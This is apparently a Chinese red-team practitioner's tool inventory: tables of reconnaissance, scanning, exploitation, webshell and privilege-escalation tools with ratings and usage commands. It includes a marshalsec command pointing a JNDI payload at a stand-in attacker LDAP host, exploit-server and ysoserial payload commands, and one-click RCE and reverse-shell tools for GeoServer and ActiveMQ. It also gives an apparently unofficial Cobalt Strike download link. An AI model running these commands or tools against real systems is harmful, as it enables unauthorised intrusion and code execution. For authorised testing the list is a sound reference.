一、攻防对抗实战
1.1 信息收集
1.1.1 综合资产测绘
1)被动资产测绘
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 | |
---|---|---|---|---|---|---|
FOFA | https://en.fofa.info/ | 9 | 被动资产测绘,数量比较全可以下载资产数据文件。 | domain=”域名” | ||
Netcraft | https://sitereport.netcraft.com/ | 6 | 被动资产测绘,数据不全。 | http://域名 | ||
Shodan | https://www.shodan.io/ | 7 | 被动资产测绘 | 完整域名 | ||
Zoomeye | https://www.zoomeye.org/ | 8 | 被动资产测绘 | domain=”域名” | ||
https://www.google.com/ | 7 | 被动资产收集 | site:”域名” | |||
Enscan_GO | https://github.com/wgpsec/ENScan_GO | 暂无 | 被动资产收集 |
2)主动资产测绘
以下工具通过主动扫描目标进行资产测绘,会产生大量攻击流量,慎用。
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 | |
---|---|---|---|---|---|---|
Goby | https://gobysec.net/ | 7 | 主动资产测绘 | |||
ARL | https://github.com/Aabyss-Team/ARL | 8 | 主动资产测绘 | 灯塔 | ||
Spray | https://github.com/chainreactors/spray | 8 | 目录扫描 | mac已安装;win10攻防工具箱已集成; | 命令行使用 |
3)主被动综合
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
mitan | https://github.com/kkbo8005/mitan/releases | 9 | 综合信息收集工具 | win10攻防工具箱已集成; | GUI开箱即用 |
Tscanplus | https://github.com/TideSec/TscanPlus/ | 9 | 综合信息收集工具 | mac已安装;win10攻防工具箱已集成;但是key需要另外获取。 | GUI开箱即用 |
1.1.2 Whois信息
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 | |
---|---|---|---|---|---|---|
chinaz | https://whois.chinaz.com/ | 7 | whois信息收集 | 有时候信息不全 |
1.1.3 IP信息
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 | |
---|---|---|---|---|---|---|
chinaz | https://ping.chinaz.com/ | 8 | 判断是否有CDN | |||
ip138 | https://site.ip138.com/ | 8 | 查询域名对应的ip | |||
aizhan | https://www.aizhan.com/ | 8 | 域名/IP综合查询 | |||
Eeyes | https://github.com/EdgeSecurityTeam/Eeyes | 9 | 快速筛选真实IP并整理为C段 | |||
IP域名互查 | https://github.com/MS02423/MS02423 | 暂无 |
1.1.4 子域名
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
chinaz | https://ping.chinaz.com/ | 8 | 判断是否有CDN | 网页检索。 | |
ip138 | https://site.ip138.com/ | 8 | 查询子域名及ip | 网页检索。 | |
subfinder | https://github.com/projectdiscovery/subfinder | 8 | 被动子域名挖掘 | MyCyberSecurityToolBox已扩展集成。 | subfinder.exe -d 域名 -sources fora,hunter,quake -v |
Findomain | https://github.com/Findomain/Findomain | 8 | 域名信息收集 | MyCyberSecurityToolBox已扩展集成。 | findomain.exe -t htsc.com.cn |
1.1.5 爬虫
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
katana | https://github.com/projectdiscovery/katana | 8 | web爬虫 | MyCyberSecurityToolBox已扩展集成。 | katana -u urls.txt -proxy http://127.0.0.1:7777 |
1.1.6 js分析
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
jsfinder | https://github.com/Threezh1/JSFinder | 9 | 爬取网页/js中的子域名和url | MyCyberSecurityToolBox已扩展集成。 | python JSFinder.py -u URL链接 |
JSFinderPlus | https://github.com/mickeystone/JSFinderPlus | 9 | 爬取网页/js中的子域名和url | MyCyberSecurityToolBox已扩展集成。 | python JSFinderPlus.py -u URL链接 -d |
Jsfinder油猴脚本 | https://github.com/Threezh1/Deconstruct/tree/main/DevTools_JSFinder | 9 | 爬取网页/js中的子域名和url | MyCyberSecurityToolBox已扩展集成。 | 启动油猴脚本,访问页面,f12 在console中查看获取的子域名和链接。 |
URLFinder | https://github.com/pingc0y/URLFinder | 9 | js URL提取 | MyCyberSecurityToolBox已扩展集成。 | URLFinder.exe -u 链接 -s all -m 2 |
1.1.7 资产探活
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
Web-SurvivalScan | https://github.com/AabyssZG/Web-SurvivalScan | 8 | web资产探活。 | MyCyberSecurityToolBox已扩展集成。 | 提供 web资产列表.txt 文件 |
1.1.8 指纹探测
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
EHole | https://github.com/EdgeSecurityTeam/EHole | 暂无 | EHole(棱洞)3.0 红队重点攻击系统指纹探测工具。 | MyCyberSecurityToolBox已扩展集成。 | EHole.exe finger -l url.txt |
1.1.9 威胁情报
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
vuln-crawler | https://github.com/zero-typora/vuln-crawler | 暂无 | 漏洞情报拉取 | GUI | |
1.2 边界突破
1.2.1 端口扫描
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
nmap | https://nmap.org/ | 9 | 端口扫描,服务识别,操作系统识别 | nmap ip -sV -sC -Pn -T 4 -p- |
|
1.2.2 目录/API扫描
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
dirsearch | https://github.com/maurosoria/dirsearch | 9 | 目录扫描 | python3.9及以上 | python dirsearch.py -u http://172.20.10.2/ |
URLfinder | https://github.com/pingc0y/URLFinder | 7 | URLFinder是一款快速、全面、易用的页面信息提取工具.用于分析页面中的js与url,查找隐藏在其中的敏感信息或未授权api接口。 更偏向于页面信息的深度提取,不是目录扫描。 | go,可以直接下载release版使用 | ./URLFinder -u http://172.20.10.2/ -s all -m 3 -o res.html |
yjdirscan(御剑) | https://github.com/foryujian/yjdirscan | 7 | 目录扫描 | win系统 |
1.2.3 漏洞扫描
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
Struts2VulsScanTools | https://github.com/abc123info/Struts2VulsScanTools/releases/download/v19.32/Struts2_19.32.jar 【项目地址:https://github.com/abc123info/Struts2VulsScanTools】 | 7 | struts漏洞检测 | ||
SpringBoot-Scan | SpringBoot-Scan | 暂无 | spring信息泄漏及相关高危漏洞扫描 | Mac已安装,win10攻防工具箱已集成。 | python SpringBoot-Scan.py -h |
heapdump_tool | https://github.com/wyzxxz/heapdump_tool 【项目地址】 https://share.feijipan.com/s/dFAuqYQy 【下载地址】 | 暂无 | spring heapdump文件敏感信息收集 | 已安装 | usage: java -jar heapdump_tool.jar heapdump_filename |
nuclei | https://github.com/projectdiscovery/nuclei | 8 | 综合漏扫 | Mac已安装。win10攻防工具箱扩展集成。 | |
pocsuite3 | https://github.com/knownsec/pocsuite3 | 8 | 综合漏扫 | Mac已安装。MyCyberSecurityToolBox已扩展集成(在SxkWorkStation上用conda虚拟环境安装后,复制pocsuite.exe文件到硬盘目录中)。 | |
SpringBoot-Scan-GUI | https://github.com/13exp/SpringBoot-Scan-GUI | 暂无 | spring信息泄漏及相关高危漏洞扫描 | 已安装 | python main.py |
dddd | https://github.com/SleepingBag945/dddd | 10但未经实战检验 | 信息收集+指纹识别+POC扫描+报告友好 | mac已安装;MyCyberSecurityToolBox已扩展集成; | https://github.com/SleepingBag945/dddd/blob/main/details.md 【详细用法】 dddd -t ‘icp.name=”xxxx有限公司”‘ -hunter -fofa -oip -fmc 1000【高效拉取资产数据】 |
SuperXray | https://github.com/4ra1n/super-xray | 暂无 | 信息收集+指纹识别+POC扫描+报告友好 | mac已安装;win10攻防工具箱扩展集成(提示xray license过期); | 开箱即用 |
weblogicScanner | https://github.com/0xn0ne/weblogicScanner | 6 | weblogic漏洞扫描 | mac已安装;win10攻防工具箱扩展集成 | python ws.py -t 127.0.0.1 |
WeblogicTool | 6 | weblogic漏洞综合利用 | win10攻防工具箱扩展集成 | GUI开箱即用 | |
Redis-unauth-scan | https://github.com/KRookieSec/Redis-unauth-scan | 7 | Redis未授权访问漏洞扫描 | MyCyberSecurityToolBox已扩展集成。 | |
xray | https://download.xray.cool/xray/1.9.4 | 8 | 漏洞扫描 | MyCyberSecurityToolBox已扩展集成;mac已安装可使用。 | xray webscan –listen 127.0.0.1:7777 –html-output res.html |
afrog | https://github.com/zan8in/afrog | 暂无 | 漏洞扫描 | MyCyberSecurityToolBox已扩展集成。 | |
prismX | https://github.com/yqcs/prismx | 暂无 | 资产-指纹-漏扫 | MyCyberSecurityToolBox已扩展集成。 | |
Fscan | https://github.com/shadow1ng/fscan | 暂无 | 内网渗透;漏扫 | MyCyberSecurityToolBox已扩展集成。 | fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 |
BBScan | https://github.com/lijiejie/BBScan | 暂无 | 信息泄露&目录遍历&管理后台&js-API&指纹识别 | python BBScan.py -f urls.txt –api |
1.2.4 漏洞利用工具
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
ShiroAttack2 | https://github.com/SummerSec/ShiroAttack2 | 暂无 | shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马) | 已安装可运行 | java -jar shiro_attack-4.7.0-SNAPSHOT-all/shiro_attack-4.7.0-SNAPSHOT-all.jar |
RuoYiExploitGUI | https://github.com/charonlight/RuoYiExploitGUI | 暂无 | 若依最新定时任务SQL注入可导致RCE漏洞的一键利用工具 | 已安装可运行 | java -jar RuoYiExploitGUI_v1.0.jar |
jmg | https://github.com/pen4uin/java-memshell-generator | 9 | 生成内存马 | 1)mac已下载可运行。2)win10攻防工具箱扩展集成可执行 。 | java -jar /Users/xiaokaisi/Desktop/CyberSecurity/武器库/反序列化漏洞利用工具/jMG-gui-1.0.8.jar |
geoserver.exe | https://github.com/netuseradministrator/CVE-2024-36401 | 9 | GeoServer-CVE-2024-36401-利用工具 | Mac和win10攻防工具箱扩展集成可执行 。低版本jdk注入内存马 | 双击运行exe |
GeoServer-Tools.jar | https://github.com/bmth666/GeoServer-Tools-CVE-2024-36401 | 10 | GeoServer-CVE-2024-36401-利用工具 | Mac和win10攻防工具箱扩展集成可执行。jdk17注入内存马需要用提供jdk9+的javac编译工具代码。 | java -jar GeoServer-Tools.jar |
CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ | https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ | 9 | Apache-ActiveMQ-远程代码执行漏洞(CVE-2023-46604)反弹shell利用工具。 | win10攻防工具箱扩展集成可执行。 | 见本站漏洞知识库之《Apache-ActiveMQ-远程代码执行漏洞(CVE-2023-46604)》 |
ActiveMQ_RCE_Pro_Max | https://github.com/ImuSpirit/ActiveMQ_RCE_Pro_Max | 9 | Apache-ActiveMQ-远程代码执行漏洞(CVE-2023-46604)反弹shell利用工具。 | mac和win10攻防工具箱扩展集成可执行。 | 见本站漏洞知识库之《Apache-ActiveMQ-远程代码执行漏洞(CVE-2023-46604)》 |
ysoserial | https://github.com/frohoff/ysoserial | 9 | Java 反序列化漏洞利用payload生成 | Mac;SecurityToolBox已扩展集成; | D:jdk8\bin\java.exe -jar ysoserial-all.jar CommonsCollections1 ‘calc.exe’ > test.bin |
1.2.5 webshell管理工具
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
AntSword(蚁剑) | https://github.com/AntSwordProject/antSword | 9 | webshell管理 | ||
Godzilla(哥斯拉) | https://github.com/BeichenDream/Godzilla | 8 | webshell管理 | ||
Behinder(冰蝎) | https://github.com/rebeyond/Behinder | 9 | webshell管理 |
1.2.6 代理抓包工具
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
yakit | https://yaklang.com/ | 9 | 单兵工具平台 | ||
burpsuite | https://portswigger.net/burp | 9 | 单兵工具平台 |
1.2.7 插件类工具
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
findsomething | https://chromewebstore.google.com/detail/findsomething/kfhniponecokdefffkpagipffdefeldb | 7 | 前端信息提取 | 浏览器插件、已安装 | |
HaE | https://github.com/gh0stkey/HaE | 暂无 | 前端信息提取 | mac-burpsuite插件、已安装 | 【https://www.ddosi.org/burpsuite-hae/】【 https://blog.zgsec.cn/archives/481.html】 |
APIKit | https://github.com/API-Security/APIKit | 暂无 | API发现、扫描、审计 | mac-burpsuite插件已安装 | APIKit可以主动/被动扫描发现应用泄露的API文档 ,并将API文档 解析成BurpSuite 中的数据包用于API安全测试。 |
nowafpls | https://github.com/assetnote/nowafpls | 暂无 | 绕WAF | mac-burpsuite插件已安装 | https://www.jython.org/download.html 【1)安全前需要设置jython; 2)插件py路径不能存在中文。】 |
1.2.8 弱口令扫描
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
week-passwd | https://github.com/BBD-YZZ/week-passwd | 暂无 | 一键检测13种服务:FTP、RDP、SSH、SMB、VNC、Redis、MySQL/MSSQL/Oracle、Telnet、Tomcat、MongoDB、WebLogic、PostgreSQL | 限windows使用 | https://mp.weixin.qq.com/s/BmsMBqIPF22SNOuA6ty05A |
1.2.9 js逆向加解密工具
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
wt-js | https://developer.aliyun.com/article/1134572 | 暂无 | js逆向加解密 | win10攻防工具箱扩展集成可执行。 | |
Crypto Magician | https://developer.aliyun.com/article/1134572 | 暂无 | js逆向加解密 | win10攻防工具箱扩展集成可执行。 | |
乐易助手 | https://developer.aliyun.com/article/1134572 | 暂无 | js逆向加解密 | win10攻防工具箱扩展集成可执行。 |
1.2.10 字典
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
fuzzDicts | https://github.com/TheKingOfDuck/fuzzDicts | 8 | fuzz字典及工具 | MyCyberSecurityToolBox已扩展集成 | |
SecDictionary | https://github.com/SexyBeast233/SecDictionary | 暂无 | 实战沉淀字典 | ||
1.2.10 其他工具
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
jwt生成器 | https://dinochiesa.github.io/jwt/ | 9 | jwt生成平台 | ||
JNDI-Injection-Exploit-Plus | https://github.com/cckuailong/JNDI-Injection-Exploit-Plus/releases/download/2.3/JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar 【下载地址】https://github.com/cckuailong/JNDI-Injection-Exploit-Plus/tree/2.3【项目地址】 | 暂无 | JNDI注入;生成反序列化链 | mac已下载;MyCyberSecurityToolBox已扩展集成; | https://github.com/cckuailong/JNDI-Injection-Exploit-Plus/blob/2.3/README_zh.md |
JNDI-Injection-Exploit | https://github.com/welk1n/JNDI-Injection-Exploit | 8 | 启动JNDI利用服务 | MyCyberSecurityToolBox已扩展集成; | java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] |
git-dumper | https://github.com/arthaud/git-dumper | 8 | 从站点dump git仓库 | mac已安装 | git-dumper http://192.168.52.13:1230/.git k8s-goat-git |
trufflehog | https://github.com/trufflesecurity/trufflehog | 8 | 密钥发现、分类、验证和分析工具 | mac已安装 | trufflehog . |
fuzzDicts | https://github.com/TheKingOfDuck/fuzzDicts | 8 | fuzz字典及工具 | MyCyberSecurityToolBox已扩展集成 | |
marshalsec | https://github.com/mbechler/marshalsec | 暂无 | 生成反序列化 Payload | MyCyberSecurityToolBox已扩展集成 | java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.XStream JNDI ldap://your.attacker.ip:1389/Exploit |
1.3 内网攻防
1.3.1 权限提升
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
znlinux | https://github.com/twowb/znlinux | 暂无 | linux全架构全漏洞提权程序 | 已下载未测试 | ./znlinux_linux_amd64 -a |
1.3.2 综合工具
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
CobaltStrike 3.14 | 链接: https://pan.baidu.com/s/1AW4nL_cJOsrO64xZQltMZA 提取码: yiqp | 9 | 综合渗透 | 详见本站《CobaltStrike》 | |
metasploit framework | kali内置,https://www.metasploit.com/ | 9 | 综合渗透 | 详见本站《MSF-Metasploit》 |
type:"POST"|type:"GET"|post("|get("|ashx?|ashx|ur1:|ur1:"|ur1:|path:|path:|path:|action?|data|params
1.4 综合工具
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
天狐渗透工具箱 | 百度网盘下载地址:https://pan.baidu.com/s/1MGZPpR-oFxGwDRlD-hLPNQ?pwd=ofox 官方GitHub地址:https://github.com/One-Fox-Security-Team/One-Fox-T00ls | 暂无 | 综合工具箱 | 限于windows环境。已在win10虚拟机安装并逐步扩展工具库。 | |
PotatoTool | https://github.com/HotBoy-java/PotatoTool | 暂无 | 红蓝攻防工具箱 | 1)mac已安装(jdk8)可执行;2)win10攻防工具箱自集成可执行。 | java -jar PotatoTool-2.5-jdk8.jar |
Rabbit TreasureBox | 百度云 | 9 | 综合工具箱 | MyCyberSecurityToolBox已扩展集成。 | |
EasyTools | https://github.com/doki-byte/EasyTools/archive/refs/tags/v1.7.5.zip | 6 | 综合工具箱 | MyCyberSecurityToolBox已扩展集成(作者未提供收集版) | |
DudeSuite | https://github.com/x364e3ab6/DudeSuite | 暂无 | 综合工具箱 | MyCyberSecurityToolBox已扩展集成。 |
1.5 其他工具
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
Deadpool | https://github.com/thinkoaa/Deadpool | 10 | fofa、hunter、quake拉取socks5代理,自动构建代理池。 | MyCyberSecurityToolBox已扩展集成。【功能类似无影-轻武器库中的代理池工具。】 | |
二、靶场综合渗透实战
三、漏洞挖掘
四、CTF实战
哈希破解工具
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
cmd5 | https://www.cmd5.com/ | 7 | 破解常见的md5值 | 有时需要付费 | |
编码转换工具
工具简称 | 地址 | 个人推荐指数(满分10) | 功能 | 备注 | 用法示例 |
---|---|---|---|---|---|
tool.lu | https://tool.lu/hexconvert/ | 8 | 进制转换 |